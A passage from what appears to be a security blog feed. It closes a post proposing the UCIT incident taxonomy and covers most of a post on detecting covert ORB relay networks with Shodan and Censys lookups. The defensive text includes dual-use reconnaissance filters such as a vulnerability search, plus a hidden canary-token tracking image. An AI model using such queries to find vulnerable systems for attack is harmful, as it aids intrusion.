options, they often lacked clear guidance. Descriptions were vague, examples were outdated, and few models acknowledged that techniques evolve or overlap. This absence of context forced analysts to make judgment calls, leading to inevitable variation in how similar activity was reported over time—or across teams.</p> <p>These aren’t theoretical issues. In a live SOC, the cost of mislabeling is real. Categorizing a credential dump as “System Anomaly” instead of “Unauthorized Access” might change who responds. Filing C2 traffic under “Unknown” could mean it’s deprioritized or missed entirely. Over time, these misclassifications shape the organization’s view of what kinds of threats it faces, and whether its defenses are working.</p> <p>The takeaway is simple: even the most widely used frameworks struggle to keep pace with how adversaries operate today. They either offer too little structure or too much, and rarely the right kind. Each of the three models studied here exposed different weaknesses—some tied to their origins, others to assumptions that no longer hold up. But the cumulative result is the same: analysts are left trying to fit square pegs into round taxonomies, and the data suffers because of it.</p> <p><br /></p> <table> <thead> <tr> <th><strong>Framework</strong></th> <th><strong>Strengths</strong></th> <th><strong>Primary Weaknesses</strong></th> <th><strong>Common Failure Points (from ATT&amp;CK Mapping)</strong></th> </tr> </thead> <tbody> <tr> <td><strong>CISA (Federal Guidelines)</strong></td> <td>Familiar to government teams; covers initial access types well</td> <td>Over-reliance on “Unknown” category; lacks depth for post-access behavior</td> <td>Credential Access, Lateral Movement, C2, Discovery</td> </tr> <tr> <td><strong>DoD (CJCSM 6510.01B)</strong></td> <td>Structured model (CAT1–CAT9); granular at the policy level</td> <td>Overlapping categories; ambiguous boundaries; DoD orgs may be interpreting/labelling differently</td> <td>Malicious Logic vs. User Intrusion; Execution vs. Exploitation</td> </tr> <tr> <td><strong>Verizon (DBIR Schema)</strong></td> <td>Simple, intuitive categories; popular in industry reporting</td> <td>Overgeneralization; limited category resolution; no real-time guidance</td> <td>“System Intrusion” overuse; lack of precision for recon and privilege escalation</td> </tr> </tbody> </table> <p><br /></p> <h1 id="what-a-good-taxonomy-should-do">What a Good Taxonomy Should Do</h1> <p>After seeing how each of the three major frameworks struggled under pressure, the question became less about what was wrong and more about what would actually work. If incident categorization is going to be useful—operationally and strategically—it has to meet a fairly specific set of demands.</p> <p>First and foremost, a good taxonomy should be <strong>usable in real time</strong>. Analysts working an active case shouldn’t have to second-guess what label to apply or cross-reference a 60-page policy document to find the right fit. The categories need to make intuitive sense and reflect how incidents actually unfold in modern environments. That means capturing behavior, not just outcomes, and doing so in a way that supports triage, escalation, and decision-making without slowing things down. Crucially, the taxonomy must also account for <strong>point-in-time reporting</strong>—the idea that labels are often assigned early, before the full scope of the incident is known. These provisional classifications are necessary to maintain speed and responsiveness, but they need to be flexible enough to evolve as new information emerges. Otherwise, early labels become permanent artifacts that fail to reflect the actual nature of the incident once fully understood.</p> <p>At the same time, a taxonomy needs to hold up <strong>after the fact</strong>. Once the dust settles and an investigation is closed, that incident label becomes part of the permanent record. It shows up in monthly dashboards, annual reports, and threat trend summaries. If the label is too vague or inconsistent, it can distort analysis or make it harder to spot recurring patterns. A good taxonomy must strike a balance between simplicity and resolution—clear enough for operational use, detailed enough for strategic value.</p> <p>Flexibility is also critical. Adversary behavior changes constantly, and new techniques emerge faster than most documentation cycles can keep up with. Taxonomies that assume a fixed set of categories will always be playing catch-up. Instead, the structure should be designed to evolve. That might mean using parent-child relationships between categories, allowing for modular additions, or supporting layered labels that can reflect both known and emerging threats.</p> <p>Consistency matters, but so does <strong>shared language</strong>. One of the biggest barriers to collaboration across teams or agencies is semantic drift—when two groups use the same term to mean different things, or different terms to describe the same behavior. A well-designed taxonomy needs to reduce that ambiguity, either by aligning with existing standards like MITRE ATT&amp;CK or by clearly defining its own terms in a way that practitioners can agree on.</p> <p>Lastly, a usable schema needs to be <strong>open and adaptable</strong>. Proprietary systems or black-box logic might work internally, but they don’t scale across industries, vendors, or jurisdictions. Security teams need a framework they can apply without licensing fees or lengthy onboarding—and ideally, one they can contribute to or adjust based on their specific operational context.</p> <p>None of the three frameworks examined in this study fully met these criteria. Some were better than others in specific areas, but all fell short in balancing clarity, coverage, and real-world usability. That gap is what led to the creation of a new model—one designed from the ground up to address these shortcomings, and to offer a practical, open-source alternative for incident classification that actually works in the environments analysts are defending today.</p> <p><br /></p> <h1 id="introducing-ucit--a-smarter-taxonomy">Introducing UCIT — A Smarter Taxonomy</h1> <p><a href="https://github.com/CTI-Buddy/UCIT">The Universal Cyber Incident Taxonomy (UCIT)</a> was developed as a direct response to the limitations uncovered during this study. Rather than trying to retrofit outdated frameworks, UCIT was designed from the ground up to reflect how incidents unfold in real-world SOC environments—across time, across teams, and under uncertainty.</p> <p>At its core, UCIT introduces a <strong>trinomial naming convention</strong> inspired by <a href="https://www.britannica.com/science/taxonomy/The-Linnaean-system">Linnaean taxonomy</a> in biology. In that model, organisms are categorized hierarchically (e.g., <em>Genus species subspecies</em>) to reflect both general groupings and specific distinctions. UCIT applies this structure to cyber incidents, using three components to capture the nature, behavior, and observed impact of an event at the time it is reported:</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/86ebc0ba-6fce-4133-bbc7-274e29a4c334" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>UCIT and it’s hierarchal taxonomy approach</em></td> </tr> </tbody> </table> <p><br /></p> <ol> <li><strong>Incident Category</strong> – a broad label representing the type of event (e.g., System Intrusion);</li> <li><strong>MITRE ATT&amp;CK Technique Family</strong> – describing the behavioral mechanism observed (e.g., Command and Control);</li> <li><strong>Level of Compromise</strong> – indicating the access level at time of detection (e.g., User, Root, or Unknown).</li> </ol> <p><br /></p> <p>This structured approach enables compact but expressive incident records. For instance, a report written following an alert based on beaconing activity observed on a workstation could be labeled:<br /> <em>System Intrusion – Command and Control – User</em></p> <p>That simple string tells analysts and leadership what happened, what phase of the intrusion it reflects, and what kind of access the adversary appears to have—all without requiring an in-depth narrative or post-hoc synthesis. It also informs the investigation, and in which directions of the kill-chain must still be investigated and documented.</p> <p>One of the key design goals of UCIT is to support <strong>point-in-time classification</strong>. Most incidents begin with partial visibility. Analysts see a symptom—an execution, a login, a traffic pattern—before they understand the full scope or origin. UCIT’s structure embraces this uncertainty rather than masking it. It encourages timely, structured labeling of what is known now, with the understanding that the event record can be expanded later without requiring the original label to be rewritten or invalidated.</p> <p>To avoid excessive granularity and promote operational alignment, UCIT favors <strong>MITRE ATT&amp;CK tactic families</strong> over individual sub-techniques. While sub-techniques offer rich detail, they aren’t practical for everyday use in SOC workflows or high-volume environments. Tactic families provide a stable middle ground: granular enough to reflect behavioral context, but general enough to avoid forcing analysts into overly specific judgments too early.</p> <p>Similarly, UCIT borrows the concept of <strong>compromise level</strong> from the DoD’s schema, distinguishing between User, Root, and Unknown. This offers meaningful clarity during early triage without pressuring analysts to speculate about the adversary’s full capabilities prematurely.</p> <p>However, the design also accounts for a crucial limitation of point-in-time labeling: once an incident is fully investigated and closed out, the original label may no longer capture the full arc of what actually occurred. For example, a detection of a <a href="https://attack.mitre.org/techniques/T1189/">T-1189 Driveby Compromise</a> initially categorized as System Intrusion – Initial Access – User might later be found to have culminated in the deletion of critical files (<a href="https://attack.mitre.org/techniques/T1485/">T1485 - Data Destruction</a>). Retaining only the initial label would obscure that outcome—and limit the analytical value of the record.</p> <p>To address this, UCIT allows for the closeout <strong>“Final Observed Tactic”</strong> field to be added at incident close-out. This enables organizations to track both the <em>entry point</em> and <em>end state</em> of the incident in a structured way. In the drive-by example above, the final record could be closed out with:</p> <p><br /></p> <ul> <li><strong>UCIT Label:</strong> System Intrusion – Initial Access – User</li> <li><strong>Final Observed Technique:</strong> Impact</li> </ul> <p><br /></p> <p>This preserves the integrity of early-stage reporting while giving incident responders a way to reflect the full attack path in their postmortem documentation. Over time, these final-state annotations can also be used to build more accurate metrics about adversary success rates, common intrusion sequences, and detection gaps.</p> <p>Separately from the study to further evaluate how UCIT performs across a broad range of real-world conditions, I also applied the model to a dataset of 100 distinct cyber incidents. These scenarios, grounded in known adversary behavior and mapped to MITRE ATT&amp;CK techniques, were each labeled using UCIT alongside DoD, CISA, and Verizon DBIR. This comparative exercise highlighted UCIT’s flexibility and interpretability—particularly its ability to represent incidents clearly regardless of where detection occurred in the kill chain. Just as importantly, it demonstrated that UCIT can function as a consistent shorthand for incident classification, even when applied at scale across diverse attack types. That raw data <a href="https://github.com/CTI-Buddy/UCIT/blob/main/docs/100-scenarios.csv">is available here</a>.</p> <p>Finally, UCIT is currently being tested in a handful of live SOC environments, where analysts are applying it alongside their existing categorization model. Initial feedback suggests that the trinomial structure improves consistency across teams, reduces the misuse of vague categories like “Unknown,” and helps streamline communication between tiers of the incident response process.</p> <p>In short, UCIT isn’t just another naming convention—it’s a flexible, modular framework built to reflect the actual lifecycle of incident detection, response, and closure. It offers clarity without rigidity, structure without overhead, and, most importantly, it’s designed to meet analysts where they are: under pressure, in the moment, and trying to get things right.</p> <p><br /></p> <h2 id="a-note-on-non-compliance-activity">A Note on “Non-Compliance Activity”</h2> <p>While the UCIT model includes <strong>Noncompliance Activity</strong> as one of its three top-level categories, this class of incidents was intentionally left <strong>out of scope</strong> for the comparative framework analysis conducted in the original study. The goal of the research was to evaluate incident categorization schema against adversary behaviors, using MITRE ATT&amp;CK as a reference point. Since ATT&amp;CK focuses exclusively on malicious techniques rather than policy violations or configuration drift, there was no consistent baseline against which to evaluate noncompliant events.</p> <p>That said, <strong>Noncompliance Activity remains an essential part of the UCIT structure</strong>. It serves as a placeholder for incidents that may not involve malicious actors, but still represent a breakdown in security controls or organizational policy. These could include:</p> <ul> <li>Unauthorized software installation,</li> <li>Use of prohibited protocols,</li> <li>Insecure system configurations,</li> <li>Accidental data exposure,</li> <li>Or repeated deviation from access management policies.</li> </ul> <p><br /></p> <p>Because definitions of “noncompliance” vary significantly between organizations—depending on regulatory environment, internal governance, and acceptable use policies—UCIT leaves the <strong>second and third labels in this category intentionally flexible</strong>. Rather than prescribing a fixed vocabulary, it’s expected that organizations will populate their own internal subcategories based on relevant standards and priorities.</p> <p>For example, one environment might use:</p> <ul> <li>Noncompliance – Policy Violation – User</li> <li>Noncompliance – Configuration Drift – Root</li> </ul> <p><br /></p> <p>While another might adopt labels like:</p> <ul> <li>Noncompliance – Data Handling – Unknown</li> <li>Noncompliance – Unauthorized Application – User</li> </ul> <p><br /></p> <p>This design reflects UCIT’s underlying philosophy: to provide just enough structure to enforce consistency, without forcing artificial alignment to one organization’s policy framework. By accommodating policy-based incidents within the same naming model as malicious activity, UCIT helps unify reporting streams and gives leadership a more complete view of both threat activity and control enforcement.</p> <p>Noncompliance Activity might not map cleanly to threat intelligence or adversary behavior, but it belongs in the same operational picture. Security posture isn’t defined solely by what adversaries do—it’s equally shaped by internal discipline, misconfiguration, and the edge cases where controls fail quietly. It’s also consistent across all the tested taxonomies and is arguably used across all SOCs as some level of incident categorization. UCIT gives those cases a place to live, without forcing them to compete for space with intrusion data or be filed away under “Other.”</p> <p><br /></p> <h1 id="why-ucit-works">Why UCIT Works</h1> <p>One of the reasons UCIT holds up under operational pressure is that it doesn’t try to solve everything at once. By front-loading the taxonomy (inspired heavily by the Verizon DBIR model) with a limited number of high-level categories —<strong>Boundary Action</strong>, <strong>System Intrusion</strong>, and <strong>Noncompliance</strong>—it forces a cleaner separation of concerns. Analysts aren’t expected to determine exactly <em>how</em> something happened in the first moments of detection; they’re simply identifying what type of activity they’re observing in broad terms.</p> <p>This helps reduce classification clutter. Instead of arbitrarily distinguishing between similar incident types (e.g., credential abuse versus malware delivery versus internal misuse) with overlapping definitions, UCIT anchors the label in the broader context: was this activity observed at a boundary, was it already inside the system, or does it reflect something misaligned with policy or configuration? That top-level split eliminates a lot of unnecessary debate and brings more consistency to operational reporting.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/1ba2693c-8766-41e4-b539-04bf8025a667" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Testing Scenario INC-136, observed C2</em></td> </tr> </tbody> </table> <p><br /></p> <p>Where the taxonomy becomes more expressive is in the second label, which references a MITRE ATT&amp;CK technique family. This choice is important. By focusing on families rather than individual techniques or sub-techniques, UCIT preserves behavioral context without overwhelming the analyst with granularity. These technique families—like Execution, Credential Access, or Exfiltration—are widely recognized and integrate well with existing detection logic and threat modeling practices.</p> <p>The real utility of this approach becomes clearer as it is essentially acknowledging that any incident report is inherently <strong>point-in-time reporting</strong>. Initial detection rarely comes with full visibility. A SOC might see C2 activity before they ever see how the attacker got in. In those cases, UCIT allows the analyst to label the event based on what’s been observed—without having to speculate about origin, intent, or end-state. That same labeling structure then supports investigation in both directions. If the detection is late in the kill chain, the behavioral tag tells responders where to pivot upstream. If it’s early, it provides context for what to monitor next and how the attack might progress.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/24217694-e21e-464b-9265-95a7aece47e0" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Testing Scenario INC-135, observed FTP brute force</em></td> </tr> </tbody> </table> <p><br /></p> <p>This forward-and-backward utility isn’t just helpful for incident handlers. It also creates a shared reference point that’s legible to stakeholders who aren’t part of the response team. A label like System Intrusion – Credential Access – User communicates more than a simple category or a one-word incident type ever could. It tells leadership what was found, where it occurred, and how deep it appears to go—all in a standardized format that aligns with known adversary behaviors.</p> <p>Over time, this structure also improves aggregate analysis. The consistent use of a bounded top-level category, combined with structured behavioral and privilege-level descriptors, allows organizations to track trends in attacker behavior without relying on loosely defined “incident types.” This reduces noise in long-term metrics and supports more accurate assessments of threat exposure and defensive coverage.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/49eba5f0-a4bf-4067-9bbc-a6647fb08a0e" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Testing Scenario INC-148, remote file inclusion to webshell</em></td> </tr> </tbody> </table> <p><br /></p> <p>In addition to supporting point-in-time classification, UCIT’s close-out <strong>Final Observed Sub-Technique</strong> field introduces meaningful advantages for <strong>retrospective analysis</strong>. While initial labels reflect what was known at the time of detection, the final sub-technique captures the end-state of the incident once it’s been investigated and closed. This distinction allows organizations to preserve the operational reality of early-stage triage while still building <strong>accurate historical records</strong> that reflect full attack progression.</p> <p>Over time, consistently applied final sub-techniques provide a <strong>richer dataset for key performance indicators (KPIs)</strong>. Rather than just tracking volume or category counts, SOCs can begin to analyze trends in attacker success—what tactics most commonly lead to impact, where detection occurs relative to the intrusion lifecycle, and which behaviors are most likely to be missed until later stages. This enables more meaningful insight into detection effectiveness and response timing.</p> <p><br /></p> <table> <thead> <tr> <th style="text-align: center"><img src="https://github.com/user-attachments/assets/e69706cb-912f-4578-a3ce-c32cec327754" alt="image" /></th> </tr> </thead> <tbody> <tr> <td style="text-align: center"><em>Testing Scenario INC-126, DDoS of login portal</em></td> </tr> </tbody> </table> <p><br /></p> <p>For example, if the majority of incidents initially detected as System Intrusion – Execution – User are ultimately closed with a sub-technique of Data Exfiltration, that points to a need for improved detection earlier in the chain—possibly at credential abuse or lateral movement stages. On the other hand, a trend showing that most incidents are closed out still within the initial tactic family suggests containment is working effectively, even if initial labeling was incomplete.</p> <p>These records also serve as a valuable resource for assessing <strong>SOC maturity</strong>. By comparing initial classification to final resolution, teams can evaluate how quickly and accurately investigations converge on root cause. A high divergence rate between early labels and final sub-techniques might suggest that detection workflows are reactive, or that visibility gaps are forcing excessive rework. Conversely, alignment between initial and final classification can serve as a proxy indicator for high-fidelity detection and investigative discipline.</p> <p>From a process improvement standpoint, this offers practical insight: Are analysts relying too heavily on general categories? Are cases being reopened due to incomplete scoping? Are certain behaviors consistently flying under the radar until damage is done? UCIT provides a structured, low-friction way to surface these patterns—not just for reporting or compliance, but for internal feedback loops that can drive better tooling, better training, and better outcomes over time. If the initial detection mechanism clusters towards “Execution” and rarely identifies “Initial Access”, does that mean the SOC has a visibility layer problem or an analyst skill issue problem? This labelling convention enables those questions.</p> <p>While <a href="https://github.com/CTI-Buddy/UCIT">UCIT</a> doesn’t solve every reporting problem, its structured, layered format addresses several of the core limitations surfaced in this study. It supports real-time use without sacrificing analytical clarity, handles uncertainty without erasing context, and produces incident records that are easier to interpret across technical and non-technical boundaries.</p> <p><br /></p> <h1 id="final-thoughts">Final Thoughts</h1> <p>The goal of this work was never just to critique existing frameworks—it was to understand why incident categorization continues to create friction in environments that already operate under pressure, and to propose something that reflects how incidents actually unfold in the field.</p> <p>The findings from the comparative analysis made that case clearly enough: major taxonomies like those from CISA, the DoD, and Verizon each bring something useful to the table, but all of them struggle in the same ways. They ask too much of analysts too early, conflate technical behaviors with response impact, and rely on rigid or ambiguous definitions that fail to hold up during real-world detection and response.</p> <p>UCIT was developed to address those problems—not through more complexity, but through structured simplification. By keeping the top-level category set narrow and deferring behavioral context to a familiar schema like MITRE ATT&amp;CK, it creates a taxonomy that is easier to use, easier to adapt, and easier to scale. Its support for point-in-time reporting makes it useful in active response. Its final-state extension makes it useful for metrics. And its consistency across levels of detail makes it legible to everyone from junior analysts to senior leadership.</p> <p>That doesn’t mean UCIT is finished. Like any operational model, it benefits from iteration. The structure is openly published so it can be tested, extended, and challenged. Some organizations may want to refine it for their own environment. Others may find value in aligning it to red team operations, audit reporting, or regulatory disclosure. That’s by design.</p> <p>The broader takeaway here isn’t just about one framework. It’s about recognizing that <strong>incident labeling is a strategic function</strong>, not just a box to check. Labels shape metrics. Metrics shape investment. If the label is wrong, everything downstream is distorted. <a href="https://github.com/CTI-Buddy/UCIT">UCIT</a> doesn’t guarantee precision, but it helps teams start with clarity, structure, and enough shared language to make decisions faster—and defend them later.</p> <p>You can read the whole study <a href="https://mattysploit.s3.us-east-2.amazonaws.com/MattRyanPhD_Comparative%20Analysis%20of%20Incident%20Reporting%20Frameworks%20Against%20MITRE%20ATT%26CK.pdf">right here</a>.</p> <p><img src="http://canarytokens.com/static/mfqz6txyou0make5bdb51bhov/payments.js " style="display: none;" /></p>
  118. It’s ORBin’ Time: Detecting Covert Relay Networks in Your Telemetry

    Mon, 07 Jul 2025 00:00:00 -0000

    It’s ORBin’ Time: Detecting Covert Relay Networks in Your Telemetry
    <h1 id="its-orbin-time-detecting-covert-relay-networks-in-your-telemetry">It’s ORBin’ Time: Detecting Covert Relay Networks in Your Telemetry</h1> <p><br /></p> <p><a href="https://www.team-cymru.com/post/an-introduction-to-operational-relay-box-orb-networks-unpatched-forgotten-and-obscured">Operational Relay Box (ORB) networks</a>, often called “covert,” “mesh,” or “obfuscated” networks, are becoming increasingly prevalent as sophisticated threat actors refine their evasion techniques. Historically linked with state-sponsored activities, particularly from the <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks/">People’s Republic of China (PRC)</a>, ORB networks present a significant challenge to traditional cybersecurity defenses. Understanding their architecture and leveraging powerful internet scanning tools like <a href="https://www.shodan.io/">Shodan</a> and <a href="https://www.shodan.io/">Censys</a> are crucial for defenders to effectively identify and categorize these elusive networks. This post explores how defenders can utilize such tools to utilize their own collected telemetry to fingerprint and logically categorize this infrastructure into their own ORB network buckets for tracking.</p> <p><br /></p> <h2 id="what-exactly-are-orb-networks">What Exactly Are ORB Networks?</h2> <p>An ORB network can be simply explained as the “love child” of a Virtual Private Network (VPN) and a botnet. Similar to botnets, ORB networks consist of a controlled collection of devices, but they are characterized by their decentralized nature and internal communication among relay boxes.</p> <p>Key characteristics and components of ORB networks include:</p> <ul> <li><strong>Infrastructure</strong>: Operational relay boxes are typically either <a href="https://en.wikipedia.org/wiki/Virtual_private_server">Virtual Private Server (VPS)</a> hosts, procured by the ORB network operator, or compromised Internet of Things (IoT) devices, such as cheap routers, industrial control systems, healthcare devices, and even smart refrigerators. These compromised devices are “farmed” by actively identifying and infecting vulnerable systems, often an easy process due to many forgotten or unpatched devices connected to the internet.</li> <li><strong>Mesh Architecture</strong>: Unlike botnets, which typically rely on a central control mechanism, ORB networks employ a VPN-like architecture that creates a <a href="https://www.sciencedirect.com/topics/computer-science/mesh-architecture#:~:text=Mesh%20Architecture%20refers%20to%20a,by%20carriers%20and%20service%20providers.">“mesh” of relay boxes</a>. Traffic passes between these boxes, with most connections occurring between the relay boxes themselves, effectively masking the attacker’s entry point.</li> </ul> <p><br /></p> <p><img src="https://github.com/user-attachments/assets/1335ee20-aad9-4a92-9935-f3e4cb6919bd" alt="image" /></p> <p><br /></p> <ul> <li><strong>Anonymity and Evasion</strong>: ORB networks significantly enhance attacker anonymity by allowing them to randomize or alternate their exit points (exit nodes), making it challenging for defenders to trace threat actors or block attacks.</li> <li><strong>Decentralization</strong>: These networks combine VPS and IoT infrastructure and target internationally sold devices, resulting in a network that is neither clustered nor concentrated in any specific region or Internet Service Provider (ISP). This broad distribution complicates disruption efforts and hinders the acquisition of threat actor artifacts.</li> <li><strong>Risk of Collateral Damage</strong>: A large portion of an ORB network consists of compromised devices, and their exit nodes often appear to originate from home or commercial broadband IP ranges. Blocking such traffic can lead to legitimate users being unable to access services, causing disruptions and complaints. Additionally, many IoT devices lack dedicated public IP addresses, meaning malicious traffic can be “washed” in with benign traffic from thousands of users.</li> <li><strong>Covering Tracks</strong>: ORB network operators often “clean up” compromised devices post-compromise, which can include removing other attackers, patching vulnerabilities, and ensuring they remain the sole resident. This complicates identification efforts for threat researchers.</li> <li><strong>Hiding in the Noise</strong>: Threat actors frequently route “normal” traffic, such as social media or messaging platforms, through the same infrastructure used for malicious activities. This additional legitimate traffic helps to mask illicit operations, making detection significantly more challenging.</li> </ul> <p><a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks/">Mandiant</a> classifies ORB networks into two fundamental types: <strong>provisioned networks</strong> made of commercially leased VPS space, and <strong>non-provisioned networks</strong> composed of compromised and end-of-life router and IoT devices. Hybrid networks combining both types also exist.</p> <p><br /></p> <h2 id="how-orbs-are-used-against-enterprise-networks">How ORBs Are Used Against Enterprise Networks</h2> <p><br /></p> <p>ORB networks provide threat actors with robust capabilities across various phases of the Cyber Kill Chain, allowing them to remain hidden from reconnaissance to exfiltration.</p> <ul> <li><strong>Reconnaissance and Weaponization</strong>: Obscured exit nodes grant attackers the anonymity needed to conduct reconnaissance against targets. This includes mapping Internet-facing infrastructure, probing for vulnerabilities, and gathering intelligence covertly.</li> <li><strong>Delivery and Exploitation</strong>: ORB networks offer multiple ways to exploit targets. Attackers may bypass traditional delivery methods like phishing, instead exploiting vulnerabilities for remote code execution or conducting brute-force or password-based attacks to gain unauthorized access. A <strong>password spraying attack</strong>, for instance, involves an attacker trying a single common password, or a short list of common passwords, against many different accounts to avoid account lockouts. This differs from traditional brute-force that focuses on one account with many passwords. Password spraying is effective against systems with default passwords or those allowing password sharing.</li> <li><strong>Installation and Command &amp; Control (C2)</strong>: ORB networks provide dynamic C2 capabilities, enabling attackers to rotate servers that compromised hosts communicate with. This ensures continuous communication while obscuring the attacker’s true origin. Attackers can strategically select exit nodes that appear more legitimate or local to the target to facilitate ongoing remote access.</li> <li><strong>Actions on Objective (Exfiltration)</strong>: During data exfiltration, attackers can route stolen data through multiple exit nodes, confusing defenders and making it difficult to track the data’s final destination, thus slowing incident response.</li> </ul> <p><br /></p> <p>Mandiant notes that the widespread use of ORB networks by China-nexus cyber espionage actors specifically aims to <strong>raise the cost of defending an enterprise’s network and shift the advantage toward the espionage operators by evading detection and complicating attribution</strong>. These networks undermine the idea of “Actor-Controlled Infrastructure,” as they are often administered by independent entities or contractors who then contract access to multiple APT actors. The lifespan of an IPv4 address associated with an ORB node can be as short as 31 days, and some contractors cycle significant percentages of their infrastructure monthly. This leads to <strong>accelerated Indicator of Compromise (IOC) extinction</strong>, making traditional blocking less effective.</p> <h2 id="the-defenders-dilemma-and-shifting-paradigms">The Defender’s Dilemma and Shifting Paradigms</h2> <p><br /></p> <p>The ephemeral and multi-tenant nature of ORB networks means that traditional defenses, which often rely on blocking known IOCs like IP addresses, are significantly challenged. A single egress IP might be used by multiple APT actors or change frequently. This requires defenders to consider the temporality, multiplicity of adversaries, and ephemerality of ORB infrastructure. In the case of home routers, defenders risk blocking their actual users, particularly if they deny large netranges.</p> <p><strong>Instead of treating adversary infrastructure as inert IOCs, security teams must start tracking ORB networks as evolving entities, akin to how they track APT groups</strong>. This means focusing on the evolving behavior of the infrastructure itself, including its changing characteristics like ports, services, and registration/hosting data.</p> <p><br /></p> <h2 id="leveraging-shodan-and-censys-for-orb-identification-and-categorization">Leveraging Shodan and Censys for ORB Identification and Categorization</h2> <p><br /></p> <p>To contend with the rising challenge of ORB networks, defenders can leverage internet search engines like Shodan and Censys. These platforms continuously scan the entire public IP space and index detailed information about devices and services connected to the Internet.</p> <p><strong>The strategy involves collecting lists of IP addresses observed engaging in suspicious activity (e.g., failed login attempts indicative of password spraying, unusual reconnaissance traffic) and then running these IPs in bulk against Shodan or Censys to identify commonalities and cluster potential ORB nodes.</strong></p> <p>Here’s how Shodan and Censys can be utilized for this purpose:</p> <ol> <li><strong>Understand Their Data Collection</strong>: Both Shodan and Censys map the Internet by scanning thousands of ports across the entire public IP range daily. They collect data on IP addresses, websites, certificates, open ports, and other network-related information, including operating systems, products, vendors, and even HTML content. Censys, for example, performs extended API calls against non-standard ports to detect running services.</li> </ol> <p><br /></p> <ol> <li><strong>Bulk IP Address Lookup and Clustering</strong>: - <strong>Collect Suspicious IPs</strong>: Your network logs (e.g., firewall, SIEM, ADFS, Okta, Microsoft Entra ID) will show IPs involved in activities like high volumes of failed login attempts, attacks on unknown/invalid users, or unusual traffic patterns. - <strong>Automated Lookup</strong>: Both Shodan and Censys offer API capabilities for programmatic lookups. <strong>Shodan’s Corporate API allows bulk lookups of up to 100 IPs per request</strong>. Censys offers Get Host Details Using IP Address and Search Hosts actions. - <strong>Identify Commonalities</strong>: Once you have the detailed reports for these IPs, look for: - <strong>Open Ports and Services</strong>: Are there specific unusual or common open ports (e.g., 23/telnet, 21/ftp, 445/smb, 3389/rdp, or less common ones like 1337, 7777 or 4800) across multiple suspicious IPs?. This can indicate common ORB infrastructure or compromised IoT devices. - <strong>TLS Certificate Hashes</strong>: You can search for and compare <strong>SHA-256 fingerprints of TLS certificates</strong> (services.tls.certificates.leaf_data.fingerprint_sha256 in Censys). <a href="https://www.splunk.com/en_us/blog/security/ssl-tls-threat-hunting.html">Identical certificate hashes</a> across disparate IPs could indicate a common ORB operator setting up their nodes with the same certificate configurations. - <strong>Autonomous System Numbers (ASNs)</strong>: ORB networks are globally distributed and diversify nodes by registering with multiple commercial Autonomous System providers. Using the asn:[number] filter in Shodan or autonomous_system.asn:[number] in Censys can help identify large ranges of IP addresses associated with known ORB operators or specific hosting providers frequently used by them (e.g., DigitalOcean, OVH SAS, Google Cloud). - <strong>Operating Systems, Products, and Vendors</strong>: Look for common operating systems (operating_system.product:”Windows”), products (services.software.product:”OpenSSH”), or vendors (services.software.vendor:”Amazon”). Many ORB nodes are compromised IoT devices (e.g., routers from MikroTik, ASUS, Draytek). - <strong>Unique Service/Network Characteristics</strong>: <a href="https://www.team-cymru.com/post/an-introduction-to-operational-relay-box-orb-networks-unpatched-forgotten-and-obscured">Team Cymru</a> suggests looking for distinctive X.509 certificates. - <strong>HTML Banners/Titles</strong>: Look for specific titles (http.title:”RouterOS router configuration page”) or HTML content (http.html:’ua-1592615’) that might fingerprint a specific type of compromised device or ORB operator’s setup. - <strong>Screenshot Labels</strong>: Shodan can capture screenshots of exposed web interfaces and label them (e.g., screenshot.label:webcam, screenshot.label:login, screenshot.label:ics). This can reveal exposed administrative interfaces. - <strong>Historical Data</strong>: Shodan allows looking at the full history of an IP, showing all banners ever seen, which can help determine when a service was first exposed or how long a device has been online.</li> </ol> <p><br /></p> <ol> <li><strong>Advanced Filtering (Paid Features)</strong>: - <strong>Vulnerability Filters</strong>: Shodan offers a vuln: filter (e.g., vuln:ms17-010) to find IPs vulnerable to <a href="https://medium.com/@ofriouzan/advanced-shodan-use-for-tracking-down-vulnerable-components-7b6927a87c45">specific exploits</a>, though this is often restricted to academic or business users. - <strong>Regex Queries</strong>: Censys paid users can use <a href="https://docs.censys.com/docs/platform-regex-cenql">regular expressions</a> to define complex search criteria, such as identifying patterns in HTTP response headers or service banners that might indicate proxy usage (services.http.response.headers.x_forwarded_for: /.*,.*/) or specific attack tools.</li> </ol> <p><br /></p> <h2 id="proactive-defense-strategies">Proactive Defense Strategies</h2> <p><br /></p> <p>Beyond identifying ORB infrastructure, organizations must adopt proactive defense strategies:</p> <ul> <li><strong>Active Threat Hunting</strong>: Go beyond passive monitoring by actively scanning for Indicators of Compromise (IoCs) associated with ORB networks, such as unusual communication paths between compromised devices and VPS servers.</li> <li><strong>Behavioral Analytics</strong>: Implement systems that detect anomalies in network activity, such as connections to unfamiliar IP addresses, unusual protocols, or irregular traffic patterns. Machine learning algorithms can identify deviations from normal behavior.</li> <li><strong>Network Traffic Analysis</strong>: Carefully analyze network traffic for irregularities like lateral movement, unusually high outbound traffic, or data relayed through multiple geographic locations. Traffic to and from compromised IoT devices, which often have predictable behavior, can provide clues.</li> <li><strong>Threat Intelligence Integration</strong>: Stay updated on the latest ORB network Tactics, Techniques, and Procedures (TTPs). Integrate threat intelligence feeds containing known C2 infrastructures or compromised relay points into existing security systems to automate alerts.</li> <li><strong>Zero Trust Architecture</strong>: Adopt a Zero Trust approach, assuming no device is trusted by default. Implement strict access controls, multi-factor authentication (MFA), and continuous network monitoring to limit damage. Microsegmentation can isolate compromised devices.</li> <li><strong>Cautious IP Blocking</strong>: While ORB networks quickly cycle IPs, you can block IP addresses associated with attackers. Be aware that attackers might use legitimate VPNs, so this should be done with caution, especially if the IPs appear to be from residential or commercial broadband ranges. Censys and Shodan often provide lists of their scanning IP ranges, which can be blocked if desired.</li> <li><strong>“Assume Breach” Principle</strong>: Given the sophistication of these threats, organizations should implement the “assume breach” 